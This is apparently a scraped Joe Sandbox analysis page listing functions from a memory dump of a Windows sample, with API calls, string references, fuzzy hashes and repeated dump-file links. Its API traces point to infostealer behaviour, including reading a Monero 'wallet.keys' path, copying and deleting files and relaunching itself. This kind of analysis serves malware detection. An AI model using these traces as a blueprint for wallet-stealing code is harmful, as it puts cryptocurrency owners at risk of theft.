Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: c428aadb61f497ffb15c422111edd675092a8b73d637178ac9a9edb8dec58801
Instruction ID: e3418c42c223656230e8dcc92d08b72a4bfc4880e0af72bc8c073d305fbbe38e
Opcode Fuzzy Hash: c428aadb61f497ffb15c422111edd675092a8b73d637178ac9a9edb8dec58801
Instruction Fuzzy Hash: A801E275900608FFCB05DFE8C998EAE7BB9EB48351F108148F9498B241C671AA40DB91

Function 0010C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 0010C8EC
___crtLCMapStringA.LIBCMT ref: 0010C90C
___crtLCMapStringA.LIBCMT ref: 0010C931

Strings

, xrefs: 0010C896

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 463e0364a008f7f439406b5b373a8ba827e17c97d470dca45a4affe1777f2216
Instruction ID: a6969b304d78bcdf0728dbbf9b9725a6a9afba092491adbbcf5ed3c4529a921b
Opcode Fuzzy Hash: 463e0364a008f7f439406b5b373a8ba827e17c97d470dca45a4affe1777f2216
Instruction Fuzzy Hash: DF41077110079C5EDB258B24CD94FFB7BE8AF45708F1445E8E9CA861C2D3B19A44CFA4

Function 00106630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00106663

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

ShellExecuteEx.SHELL32(0000003C), ref: 00106726
ExitProcess.KERNEL32 ref: 00106755

Strings

<, xrefs: 001066D9

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 0752ea931c19cee7b02f454a8600eae3f2309f5d144600382a2a37fc5b535615
Instruction ID: 5a2a4fde949fa9d96d97ee5a84170cc4ef711a99005bc37d2c95150feaead4fa
Opcode Fuzzy Hash: 0752ea931c19cee7b02f454a8600eae3f2309f5d144600382a2a37fc5b535615
Instruction Fuzzy Hash: 91312DB1901218ABDB15EB90DC95FDEB77CAF64300F804189F285661D1DFB46B48CF56

Function 001087C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00110E28,00000000,?), ref: 0010882F
RtlAllocateHeap.NTDLL(00000000), ref: 00108836
wsprintfA.USER32 ref: 00108850

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Strings

%dx%d, xrefs: 00108847

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: 90daca77dec57f71ed5d4caaf5a9af3b41e0e9f0f1dddc46fb2767ceaebe8b9b
Instruction ID: 103e8d226a99fd44a4b343aefafef9390d0c050aab85b24c569b83dead5a8d94
Opcode Fuzzy Hash: 90daca77dec57f71ed5d4caaf5a9af3b41e0e9f0f1dddc46fb2767ceaebe8b9b
Instruction Fuzzy Hash: 60211FB1A44608AFDB05DFD4DD89FAEBBB8FB48711F104119F645AB2C0C779A901CBA1

Function 00108D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0010951E,00000000), ref: 00108D5B
RtlAllocateHeap.NTDLL(00000000), ref: 00108D62
wsprintfW.USER32 ref: 00108D78

Strings

%hs, xrefs: 00108D6F

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 291d6956a296a2f6b08748c2feb48364f8a8ef4f70adc4be24b1ef1244357714
Instruction ID: 05818a01854298d7a5b8b3142edb0349237558095549aca3b81cf718a17dcac9
Opcode Fuzzy Hash: 291d6956a296a2f6b08748c2feb48364f8a8ef4f70adc4be24b1ef1244357714
Instruction Fuzzy Hash: E2E08CB0A40208FBC700DBD4DC8EE69BBBCEB08702F000094FD4A8B280DA719E408B92

Function 000FD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 00108B60: GetSystemTime.KERNEL32(00110E1A,00CDA8E0,001105AE,?,?,000F13F9,?,0000001A,00110E1A,00000000,?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 00108B86

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000FD481
lstrlen.KERNEL32(00000000), ref: 000FD698
lstrlen.KERNEL32(00000000), ref: 000FD6AC
DeleteFileA.KERNEL32(00000000), ref: 000FD72B

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: c48bbae0704e015e82385cdbf956657d021d288022829a616c1c5511a5c88f18
Instruction ID: c0f0da81a2a64d389786915f968fe16b3d7d23b9f7cb1a90cdcf2035c3b5f0d9
Opcode Fuzzy Hash: c48bbae0704e015e82385cdbf956657d021d288022829a616c1c5511a5c88f18
Instruction Fuzzy Hash: 379107719102089BDB05FBA4DD96EEE733CAF34301F908169F587660D1EF746A49CB62

Function 00103560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: b6240a69c06d8ca04f4c1efdb668cc19150e26cf874401bb2a304eeb32ca571b
Instruction ID: 7fc3b963640b66475a52cc133c96bc64797237bb8a7ba5daf9669206e3c43d79
Opcode Fuzzy Hash: b6240a69c06d8ca04f4c1efdb668cc19150e26cf874401bb2a304eeb32ca571b
Instruction Fuzzy Hash: A2411F71D14209EBCB08EFA4D895AFEB778AF58304F408018F556772D0DBB5AA45CFA2

Function 00107980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00110E00,00000000,?), ref: 001079B0
RtlAllocateHeap.NTDLL(00000000), ref: 001079B7
GetLocalTime.KERNEL32(?,?,?,?,?,00110E00,00000000,?), ref: 001079C4
wsprintfA.USER32 ref: 001079F3

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 86d722b43d3f880f0d18c648d21c206c04f1e9a6aac3ed0a20635acf3656afb4
Instruction ID: e135430e4a5701721afc2c20bc9ed2dc01a779d4b910f7362eff72e331f8fa36
Opcode Fuzzy Hash: 86d722b43d3f880f0d18c648d21c206c04f1e9a6aac3ed0a20635acf3656afb4
Instruction Fuzzy Hash: 371118B2904518AACB14DFC9DD85BBEBBFCEB48B11F10421AF645A2280D3795940C7B1

Function 001092E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00103AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00103AEE,?), ref: 001092FC
GetFileSizeEx.KERNEL32(000000FF,00103AEE), ref: 00109319
CloseHandle.KERNEL32(000000FF), ref: 00109327

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
